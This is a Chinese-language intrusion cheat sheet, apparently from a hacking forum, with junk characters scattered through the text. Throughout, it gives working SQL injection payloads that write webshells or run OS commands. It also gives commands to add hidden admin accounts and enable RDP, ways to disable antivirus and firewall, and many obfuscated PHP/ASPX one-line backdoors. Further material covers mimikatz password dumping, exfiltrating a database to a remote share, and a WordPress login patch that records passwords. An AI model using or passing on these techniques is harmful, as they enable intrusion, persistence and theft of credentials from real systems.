1 m. h- Y4 C, E0 }& ]/ J% OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a( g- E) x1 x2 h1 Q( L5 D
access中导出shell, @! b5 ]; X. i7 z; |
3 |$ T9 U9 ]( ?+ E  E+ k
中文版本操作系统中针对mysql添加用户完整代码:
9 n+ r% J- y5 |1 L) M2 M0 o$ }5 {- A: s1 ^, Y
use test;9 q* M4 ?4 w, o, Q, r* y8 x
create table a (cmd text);
$ W" p* K& u0 [  [7 r9 Z' [% Vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );$ U- q/ g+ n+ K; Q) ^) v
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( E0 U# H. Y9 o3 z0 [
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );, @2 i$ r0 p) g
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
- F# J& W1 {+ G' o) L! V, y* U, w& cdrop table a;
# x9 }7 y* ]- ~/ h- n8 k% m/ N, F. J# T4 L! T: Q
英文版本:/ e( r+ W  t- H' G7 h5 y: F
# P0 h$ h' c+ k7 V8 i
use test;
+ Z+ _' G- U: @9 ?create table a (cmd text);: w, M7 v( `' e$ }& m( H1 u. c
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
/ @, n: v& u+ s( ^insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) A0 D6 M5 ?! C  `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: J) W, b* D& ~; Nselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";! I+ P2 ?+ L* M# T* d( M5 Z
drop table a;/ F' |" r: `0 o5 ?7 X4 @  C
: Y& X0 X. S7 x
create table a (cmd BLOB);' Z/ l7 N/ n9 _  v3 I+ W
insert into a values (CONVERT(木马的16进制代码,CHAR));8 |3 F" t- }! ]2 n7 l  a
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'+ {5 \* N' o4 l7 h; V' w+ }
drop table a;
% P, k, J, d7 {  |( E9 J" p# ?& z( k/ Y; `# _
记录一下怎么处理变态诺顿
9 h9 q) L9 b3 [. W- Q8 y7 |0 @查看诺顿服务的路径
1 Z7 N1 `' t, x$ E8 J) S& gsc qc ccSetMgr
0 x- F% ]. E8 |& N5 l; t然后设置权限拒绝访问。做绝一点。。
4 r3 S" o8 [8 j7 ]- v0 Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
: K* @. G, R6 icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"1 J+ [0 t( z! ^, ^
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators% w+ U- J/ P: B) |/ X. w0 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone) T. @6 x  _; L) \9 v4 z. W

" J, E; O, f; ~3 `, k% r( {7 E然后再重启服务器4 _. A  k; h, A& [1 [
iisreset /reboot+ n0 P/ q& L# a
这样就搞定了。。不过完事后。记得恢复权限。。。。
5 m3 I7 z! Q7 G4 V" r+ Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F: k9 _8 }6 }0 T. k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F( |" N# J& ?4 `% @3 U# r; |# i
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 d5 \& r2 O: g0 P5 X# F% Q$ Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F7 o/ Y4 z! A8 d& s9 l2 R, @
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin4 M% w0 V0 c  ^2 A/ _  \3 I

5 t- X: _: h" g$ p# Y# b# ZEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
5 E# i! ~$ C1 A3 n6 I+ i5 j- f* k& j( Y, o3 }+ @% c
postgresql注射的一些东西
1 [3 X3 c) ]4 F' F( ]) N9 w如何获得webshell2 [4 G& q* P$ p+ @/ D
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); " W+ ?4 F, n( Z2 h
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
6 }/ m" Z1 r; K: e' S9 a- y* `( q4 ahttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! S, n+ K9 L/ E( g如何读文件
( \) H6 u2 D2 W! B& f# Y" Xhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 `, d2 R# a3 t% a! h
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ A9 S* N- s! y3 u
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
2 R3 N5 D4 J8 S1 S: }0 h9 k6 v# l- j1 J1 o' L& q! ]( e
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。* C2 g) @; ?: M6 k0 t. u' I
当然,这些的postgresql的数据库版本必须大于8.X1 s0 C7 l. Q1 Q% _
创建一个system的函数:* {' f: {5 V( g" X4 L4 K5 O# {! b# H
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT# X  L$ X( z* B' C
/ A7 C, z% d. Z6 [# o) B
创建一个输出表:/ E/ D" @; C/ c6 g( |; |
CREATE TABLE stdout(id serial, system_out text)
4 |$ ^! r5 E9 K+ x' j9 m: j/ g! l' a; X" p- t! t+ z
执行shell,输出到输出表内:
* s" O* \; |; `" |, WSELECT system('uname -a > /tmp/test')
' k# Y8 v, A& i( j, Z2 j! [' T  w
copy 输出的内容到表里面;7 e7 D6 A" ?1 B% p# k" W5 u, B" R
COPY stdout(system_out) FROM '/tmp/test'
5 J  F5 H9 G1 Y. M  }8 l" B) o" s
( e# H* [. a* I" B  E. s从输出表内读取执行后的回显,判断是否执行成功
- a. J% N1 s! K# J, L. k& E: {  S& x9 }; w1 S/ ?4 a) M
SELECT system_out FROM stdout! v- ^7 T6 U5 k) k( G" t  {
下面是测试例子+ g% H# g3 o2 h6 L0 x5 e

, K. `5 P, c  r9 i; r# V/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- # i  D& d& w. ]# @2 S

1 w- f& J# n6 |/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 V* F; }3 A; NSTRICT --
& e5 i; h$ W4 [8 e  h1 d. i7 G6 j) D+ Q9 G8 l
/store.php?id=1; SELECT system('uname -a > /tmp/test') --: U% V- Q' E9 w1 r% s% v
0 g' K( ?- k2 ~" v, n# d; @0 z2 p+ h/ l
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --: b& R* x' r) h, Q8 q3 q% V) o# b
$ M8 @  p+ f8 o: ~, w4 `* A0 v
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
9 U/ b* ~+ r) C; M! L+ r4 v! Enet stop sharedaccess    stop the default firewall
  N* @" l$ n# }netsh firewall show      show/config default firewall
, o$ r9 n, k( G8 i; v6 C+ nnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
! t& p5 Z) j" {/ F& X( qnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall. Q" w; J: u5 ?2 Z4 E" I
修改3389端口方法(修改后不易被扫出); Q: I6 o' E. D# O5 q
修改服务器端的端口设置,注册表有2个地方需要修改% n% O4 M. Y& F2 M% Y* v; N- I

' [2 l) `0 P* i  I[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]" ?  c2 M8 T. e7 R0 i5 x; v
PortNumber值,默认是3389,修改成所希望的端口,比如6000
* x2 ^4 [8 T! u- d% X( m& Y  W/ w9 [! P
第二个地方:" U+ z$ [1 o6 b9 U# |
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
' r0 Z8 u( F: e8 U. cPortNumber值,默认是3389,修改成所希望的端口,比如6000
4 Q, b% T& V( @6 M  ?/ O1 d
8 k$ ^: {1 j: `7 X现在这样就可以了。重启系统就可以了
- Q5 H: a* e& n3 U: m" L( R6 M0 N8 _9 E& }1 Y, o# [2 q
查看3389远程登录的脚本
2 _1 O% @* J$ m4 v( O' {保存为一个bat文件
. R  N( x* [1 X2 l) T& gdate /t >>D:\sec\TSlog\ts.log1 W3 ^6 P8 ^/ j. C
time /t >>D:\sec\TSlog\ts.log
1 z: F$ m. V! \9 F& _# tnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
; o# J8 R; w" _7 J+ ostart Explorer! ?& |) J7 i5 b* j0 f) X( m! v
& a- a1 o6 O0 a3 C6 I1 I5 _
mstsc的参数:
  N, |+ X& A3 W# N1 }( ?# r+ S3 Q2 Q$ ?4 Q
远程桌面连接* n% [! ~1 @+ e2 w* h

3 g$ c! J+ h# i: {) |1 B" LMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]4 V# K9 o  c. p" l1 z$ ~
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
9 T! v* U4 [! b  r7 W4 e  z0 k0 [7 `% y4 b/ ?4 e( X
<Connection File> -- 指定连接的 .rdp 文件的名称。
6 G; l' R2 |3 b2 j( m: ^: M, W- w2 P/ I3 e+ S; j# B" c: F
/v:<server[:port]> -- 指定要连接到的终端服务器。
5 [, X7 l6 K6 g" |0 u+ r- t1 F" j: [' V$ Y
/console -- 连接到服务器的控制台会话。9 D1 Y0 y4 ^! K( k0 O  y
; k1 s, V3 B% z/ [- ]; ], _+ e; V
/f -- 以全屏模式启动客户端。1 O$ N( v5 u' v9 j  c# c) \
7 p' N- R1 f  J0 |* ^7 j. i
/w:<width> --  指定远程桌面屏幕的宽度。
' Y9 @5 Z! y! r7 d# D! i
6 ~, j& l" `8 V0 L# b$ [$ c1 r/h:<height> -- 指定远程桌面屏幕的高度。
/ N( c' [9 X! R0 V2 o2 |9 d/ I8 b2 ]: ^; e, x" _
/edit -- 打开指定的 .rdp 文件来编辑。0 }: y  ~5 l* H6 T, ?$ j& C
! q6 _0 Y0 d3 B# `/ s
/migrate -- 将客户端连接管理器创建的旧版3 A5 G+ C$ y! l" u! B6 u! ]
连接文件迁移到新的 .rdp 连接文件。
0 C) ?. v  Y% L. N! V3 o# M
$ Z' ]' T1 c1 U8 U) e$ G( y' q- F
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
) c1 {3 f/ X- rmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
9 k' V+ d& F" |- ^1 O8 H  }( Z7 c+ X/ p4 Y7 F' I
命令行下开启3389
  n! K0 h7 R- p) @8 t# H% h. `: nnet user asp.net aspnet /add
9 t/ V  \/ ^! m) B4 D3 wnet localgroup Administrators asp.net /add1 I6 m, I7 r5 d# m8 r; ~+ W
net localgroup "Remote Desktop Users" asp.net /add  z0 A' K3 q. m' z
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
+ `' b/ Z6 l5 k! b. T) w" l& }9 vecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 02 J2 D) c! m9 G
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
1 S! ?9 ^' Y4 Y; v+ Zecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f& F$ O% |  i; |" r3 R/ C$ B
sc config rasman start= auto
1 C- R% K" t/ N: |7 ^. hsc config remoteaccess start= auto5 Q; O, U3 `# y+ z- G, K
net start rasman9 N  F" I# W* H) h: X( i7 c
net start remoteaccess
+ a/ S$ j9 U. \+ FMedia6 P4 y5 i+ K& U/ n
<form id="frmUpload" enctype="multipart/form-data"3 t2 T5 e9 w, [9 j$ d% Z" q
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, ]- Q# V( t/ P- Z, u7 H1 Z<input type="file" name="NewFile" size="50"><br>$ k8 z! F" G2 i: T
<input id="btnUpload" type="submit" value="Upload">4 C, e# h3 U: S7 Q# f
</form>
% U+ b. ~- }9 `5 H7 ?4 z" c; e) Y1 d9 m$ N/ ~1 S0 t! t; P; x
control userpasswords2 查看用户的密码8 q* D! Y2 |0 t8 F$ W& a& T
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径8 w* M- `; I% i6 r. Z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a4 p, u2 P7 {, t1 s9 @1 Z3 [
: C3 M. T6 I, K. f$ f0 K+ }! M1 m
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
% ]) h& Q+ B4 t. y测试1:1 n1 b7 K( l: ]8 z' X) M
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
4 |8 {4 K" F$ q6 A- x1 |
# c% n  i" z4 U测试2:
# }/ \6 `" V$ Z" ~+ U% v, v( l) T  N) ^! ]3 W! T& S; Y
create table dirs(paths varchar(100),paths1 varchar(100), id int)2 M/ f* l5 J) t
8 ]1 _7 x1 f4 Z! A
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 r( l# C" u% M' u, U, p
% Y8 w8 f& c% \" ]4 i: JSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; ]0 W5 b7 h- K# G关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令/ m+ X4 Q1 y& r. S; Y( Q
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
) x- N- z1 i; z1 b1 ]; N" L- z2 Y5 E! Vnet stop mcafeeframework0 {! E6 h. J5 Z& X. B- w1 q( c4 c5 `
net stop mcshield
1 f  a2 j5 d1 m3 f: Z5 Znet stop mcafeeengineservice( f3 d6 \. e8 `! a8 J
net stop mctaskmanager
/ T- ~; `& h' Q4 `* Y* i' Thttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D$ b2 _" Y& k& }- f2 \3 d' A2 {1 G
6 J0 z; T& @9 o; M& ^
  VNCDump.zip (4.76 KB, 下载次数: 1) & h# O1 \9 S2 [' Y$ a( N* v$ t" @
密码在线破解http://tools88.com/safe/vnc.php
8 @8 S+ u* Z$ N) j* M+ x; JVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
7 y  e# e4 q. z* N' Q0 I+ v" r" V5 B
exec master..xp_cmdshell 'net user'! K- h6 g- w5 n
mssql执行命令。- c3 h' ?; z  v5 M  [
获取mssql的密码hash查询
( A& Z& w' P# D% P$ Oselect name,password from master.dbo.sysxlogins
+ \6 b& S5 _0 i8 `5 D
" s% f. i3 h( p5 Mbackup log dbName with NO_LOG;. a0 i& e) ~  W) h1 N
backup log dbName with TRUNCATE_ONLY;. o/ i4 b( o7 }( G% _, d5 S) ]
DBCC SHRINKDATABASE(dbName);" T4 E, z$ l" h
mssql数据库压缩
  s# a1 O+ L+ T/ P1 |# E0 M2 N2 L9 u7 ~$ e5 p8 }; Z  A6 O% i
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
+ _6 L( Y3 P* r将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。% k' ^3 N" d8 u& Y

) U. d. f1 i& J4 J% sbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'7 }& K+ g. k0 E; G; d" M
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak1 g/ a& e' p. M- |8 P; I

/ H# _/ a0 b2 M' L2 U$ jDiscuz!nt35渗透要点:
, J. y1 o; {8 q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 i3 m3 h  j+ ]! g# V) {(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
5 ?7 d; E3 B' d4 e(3)保存。: F+ L9 n& G/ w) Y
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
; Z1 n- U4 q4 M9 V  R1 od:\rar.exe a -r d:\1.rar d:\website\
8 z: ~8 D5 T! u; l递归压缩website0 M+ x( o# J4 e4 `
注意rar.exe的路径
7 ~1 D" ?  [% q- h% s# x* h. B' i" V/ {6 n( q
<?php
" ^9 _% r0 X, o' @% k
9 Q( s+ T! v2 S  ?6 \5 Z) D$telok   = "0${@eval($_POST[xxoo])}";! i" q) w: W+ `+ _1 `2 a

: q9 U, G4 o# y1 \$username   = "123456";7 _, ]  R+ a; U* Z! f3 E. \+ N

0 S0 a- g. i5 j: @. [$userpwd   = "123456";/ i' X) y( c5 s( L; k3 c5 i
3 }! x" N0 m( H' \' {6 a
$telhao   = "123456";2 L# F: z  I5 L3 n  a8 Y' ?
) V/ c( F+ c- C0 v5 g8 l- G
$telinfo   = "123456";
6 p  X6 D2 g4 R7 L( B0 \3 c; G3 k8 K) M; R, r* f. Y$ e+ v
?>+ H  L# V* V5 D& d8 E& l' v7 F
php一句话未过滤插入一句话木马8 X! e, q0 X% p

1 v0 v5 F4 m; K% X9 z) D站库分离脱裤技巧0 ]( w* L& I* S# K3 L5 J% c6 ?
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
- ?. i' r; J0 X* s- ]/ h2 Cexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'7 L8 {4 @8 h* E8 G2 S' }# d9 M+ }
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。: K" U1 P/ r  R: d2 B, H
这儿利用的是马儿的专家模式(自己写代码)。& a% M2 t7 }3 m( |
ini_set('display_errors', 1);. V; {5 c0 A/ k% ~
set_time_limit(0);
2 W4 v2 L* u+ _error_reporting(E_ALL);
; }, a7 g( z4 g$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());, g6 Z; m; c0 K  l* S
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());& S' r9 q% {: h: w1 L
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
" g* k2 l4 G; a" G2 T" N2 p+ z$i = 0;; C. O: r8 p9 S* ]- X
$tmp = '';! r) b( a; M5 D
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
* O' B) t) i# J0 x$ g    $i = $i+1;
8 V+ ^' S( {* N4 J! k5 [/ I1 p5 W    $tmp .=  implode("::", $row)."\n";" m5 z+ K3 }/ o/ n% ?2 f
    if(!($i%500)){//500条写入一个文件6 N, Q% i, _2 w. T7 b: u1 c: y
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';4 T+ e( q' ~; m/ `
        file_put_contents($filename,$tmp);. l% k: r7 l0 f% [: E0 R3 S+ V
        $tmp = '';1 h6 {% l$ x3 U% O
    }( x& {% S+ i3 ]5 ~- V* Q
}3 W8 I7 q5 [. ]4 A) C) E' m! V
mysql_free_result($result);7 D; \7 C: {  k

$ U3 n! C4 K) D- B9 J' u; [' o) I7 f& p  y& B8 b' Y

3 o  M# p) M8 V+ O//down完后delete
, L7 I7 O" ]9 T$ W" W+ F( Z' M, M9 z  ^+ z
  X0 l4 v0 G3 _+ B- c/ u
ini_set('display_errors', 1);
; O9 s1 V& C2 V* perror_reporting(E_ALL);# f3 s! k5 |) D& y, S
$i = 0;( {$ ]7 }, t9 r  g9 E
while($i<32) {
3 I) s- U: e- I6 p: k- p" W    $i = $i+1;! }9 b* H, j( T3 V
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';& m% R) @! _! ?$ z8 \3 J
        unlink($filename);
2 f2 k1 A) Z1 t" s/ s" E0 J} . p# j2 u$ I5 g9 y0 _" D( `
httprint 收集操作系统指纹
* v% ~# S# u* h6 j- P( ]扫描192.168.1.100的所有端口
2 p, w* \! Q, C( Z4 L# {/ m6 Lnmap –PN –sT –sV –p0-65535 192.168.1.1000 A' }, z) ?/ k7 M  p* j# u$ L, B
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
  p* B9 ^( S6 shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
' h3 U5 @+ N  d1 Y) T3 aNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
& n$ U" d  ^1 s/ ?7 ]) T: }! B2 w3 ~' K
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. l) g. F. w" t0 G9 t$ `( ?; B: w4 f1 e/ f3 [
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
* v* ?! A* A* I8 H. a) _# l' r% d- _0 S7 C/ |1 v
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* q' \) b5 m! C* S0 q; [* i1 v2 u8 L
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
% }/ t* e1 S% ?" Y5 e- b# t4 L# K6 t* [$ k  [
  http://net-square.com/msnpawn/index.shtml (要求安装); ]: c% [$ |# n& [% j0 f5 r' V; ~' r

: J" W% T: K. |  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
) g  S0 h- N2 W+ i( r9 W% x& m( o
, @& G4 p  j9 C/ \  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
! N$ A, P, I4 P# p& b3 @' Iset names gb2312/ u: H4 Z8 y( Y7 v  t, n; y3 Z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。; \- l7 j& `7 p* g2 Z8 Z9 }

9 d& F- h# Q; `mysql 密码修改5 @; z! \2 R6 [/ |0 I) x
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
/ ?% y' Z* r! U$ ]& L' pupdate user set password=PASSWORD('antian365.com') where user='root';
1 C& W: y+ m. l4 gflush privileges;
* _: U- m# Q+ Q0 A高级的PHP一句话木马后门" u6 d; F- d( ]7 }2 Y

# c. g1 k1 X/ p( G/ c, o入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀) l9 u8 q4 e1 k, T' X7 K
, X; h# C) G7 B
1、
4 `% ~' n0 }; r: m
% B/ `1 D0 y- t* l& Y$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";4 f- w- F' ~2 ~9 u
* v. N  \  {3 `' w1 |6 j
$hh("/[discuz]/e",$_POST['h'],"Access");
2 R5 j" |8 J1 ^4 S9 T: ~8 {/ W4 s; r6 H( d& B
//菜刀一句话; S8 y5 ?( e1 i2 i4 l' C) P

6 D. f" E# c4 U& C/ p/ U. c- ~2、7 u% A5 f; }) ?0 N3 `' L
4 H2 x" u$ b7 }0 v  w3 P
$filename=$_GET['xbid'];7 j. z- h: ~& k* j( U: o* X
7 f' D0 J, \$ j+ L, f$ G" F4 R) v/ ?# |
include ($filename);& g' g9 X  ~9 B* M2 `
6 f, q7 i" P. A) r  Q
//危险的include函数,直接编译任何文件为php格式运行
' o0 O8 F! Z. ]  v5 V
5 |+ K9 _+ A. w" m7 D3、8 ^- k4 i9 T7 R3 k, Y" c0 L% P

  t2 k( f  B7 \* y/ [" H$reg="c"."o"."p"."y";2 M: _" Q# Z& w" u

5 |- i( Y9 r  w8 P. Y" w$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);& H3 Q- w' n; x, e1 o

' y& e; s' n' q  ]7 ~: q& X/ P/ d//重命名任何文件
( d! b  x: f$ d9 ~1 e" r! ?# l9 R3 |
4、7 f0 Q% d! ^% b+ f+ E
1 B3 d  G: x" {" H. Q
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
8 n) S% p. |2 Q1 O
% i3 X8 a9 @" c9 p1 l! v$gzid("/[discuz]/e",$_POST['h'],"Access");
+ ?% p) y$ u( D5 t! ^/ d% s+ s, u- x* S# }9 t! }) [; z
//菜刀一句话( w- S& w) `! E. t! @& ^

& C% U5 Q( Z! q4 d, S$ V; n$ z5、include ($uid);# C( i; i) }# u" g! ]" I$ o0 t

3 B( |. h) {" x1 P//危险的include函数,直接编译任何文件为php格式运行,POST 6 C" W7 D4 U" u, c, r5 F) o9 s9 ]
) r( }4 v/ I# ^: C" X

2 F* Q( j9 Z3 x  X//gif插一句话0 ~9 @3 @) V% h; r! G3 n- Q

' c' a( y2 \, V7 e1 J8 c6、典型一句话: B, k. ]9 T4 l0 @% b/ n
7 t1 e! g( c1 b( N# f0 I
程序后门代码) L" A5 z( R$ Y  p5 q9 ~
<?php eval_r($_POST[sb])?>
# ^# j( U2 @0 ], m9 n  T# S程序代码
$ R) V$ _) Z; A: ?) ^$ n$ ]! x<?php @eval_r($_POST[sb])?>
& u  V3 C/ S/ C//容错代码: y2 e. i) D0 ]& j+ B0 U
程序代码
+ v' g" v# P5 J$ i6 B<?php assert($_POST[sb]);?>7 r5 d7 u7 h2 A9 M' ~) ~% q
//使用lanker一句话客户端的专家模式执行相关的php语句
( Z2 C8 b3 P( `' Y程序代码2 _. u1 M, e  O; X
<?$_POST['sa']($_POST['sb']);?>, T4 D* g+ E; X' R6 Q: W* W, U. q; K+ r
程序代码3 Q1 h* i4 s. n) o  y
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 e) d( H* `0 O$ r) q1 Y
程序代码
4 F9 W+ {; w8 K$ U4 B7 r<?php
- m& \/ q0 [8 Q: m, h: c@preg_replace("/[email]/e",$_POST['h'],"error");8 }1 F8 u+ S) k7 [9 }
?>
7 {' u. f1 Q4 [" k8 q//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
/ _* A+ s6 f: o( U9 w1 l程序代码! W3 ^& @  Q! z9 T. P
<O>h=@eval_r($_POST[c]);</O>
, W$ H3 ]/ W. ]! A5 L# r; l程序代码
5 X  @8 q" ?$ G3 d, a<script language="php">@eval_r($_POST[sb])</script>
2 j& O; }+ h2 m//绕过<?限制的一句话
1 S* k9 v" S' ?# Z$ q1 l
" [" \+ _4 U* O7 {9 B, Shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip8 j5 K$ L( Z" z- V
详细用法:
  D6 d3 [9 g" f1、到tools目录。psexec \\127.0.0.1 cmd
# H3 t9 N  J+ @4 X) Q2、执行mimikatz, N( }- a6 K# `9 E8 R
3、执行 privilege::debug1 Y$ q$ |3 t+ B$ t
4、执行 inject::process lsass.exe sekurlsa.dll
* R. r" n; M5 c3 f  X4 e5、执行@getLogonPasswords; F0 J0 J! t9 Q' O: i* V, d
6、widget就是密码
4 X. U& o* F0 Z& M+ t$ x( w7、exit退出,不要直接关闭否则系统会崩溃。
& @% u! ^3 P0 F0 x/ x1 |4 z: u" c: d1 \. E* m7 G9 t5 X1 A: t- F5 s
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
" D+ P' n7 f/ _# r+ n- B5 L
, h: W2 h2 y- S% e' k自动查找系统高危补丁3 U; B7 H/ T( u7 {' W5 z3 S5 `
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 u( P3 h+ `& x" A7 O) f: \

- d, @: `3 ?8 \6 C6 y突破安全狗的一句话aspx后门+ U5 n7 b) ~; t
<%@ Page Language="C#" ValidateRequest="false" %>
: K5 N4 D% K: r. Q7 y<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
( \! O' V; y+ t3 N8 f& z% B" Swebshell下记录WordPress登陆密码
( L: E# d& w: \webshell下记录Wordpress登陆密码方便进一步社工9 E4 }  L' @/ t- S: i1 K6 }0 m  {
在文件wp-login.php中539行处添加:
3 ?' U% E, u- ]9 `0 }3 T: y; d// log password
5 n1 Q: H( A+ Y+ p  k$log_user=$_POST['log'];/ }9 p. M9 g! c1 i, G5 C9 y% m& f: c
$log_pwd=$_POST['pwd'];7 z$ a( O+ p! F: ~3 I* F4 l9 U
$log_ip=$_SERVER["REMOTE_ADDR"];% p, c2 P% O7 x+ U
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 S8 ]" F5 l; B7 ?$txt=$txt.”\r\n”;
